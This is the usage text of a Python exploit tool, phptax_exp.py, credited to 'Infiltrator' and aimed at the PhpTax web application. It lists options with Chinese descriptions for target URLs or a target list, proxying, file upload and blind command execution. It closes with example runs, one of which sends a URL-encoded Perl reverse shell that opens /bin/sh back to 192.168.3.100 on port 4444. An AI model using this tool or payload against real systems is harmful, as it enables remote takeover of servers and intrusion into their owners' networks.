usage: phptax_exp.py [-h] (-u U | -f F) [-p P] [-H H] [-t T] [-uf UF] [-e E] [-o O]
phptax Exploit --By Infiltrator
optional arguments:
-h, --help show this help message and exit
-u U 目标URL,如:http://www.test.com/phptax
-f F 目标URL文件
-p P 代理地址,如:http://127.0.0.1:8080
-H H HTTP Headers,如:{"X-Forwarded-For":"127.0.0.1"}
-t T 超时时间,单位:秒
-uf UF 上传文件
-e E 执行命令(无回显),需进行url编码
-o O 保存扫描结果到文本文件
py phptax_exp.py -f target.txt
py phptax_exp.py -u http://192.168.3.209:8080/phptax -e perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.3.100%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27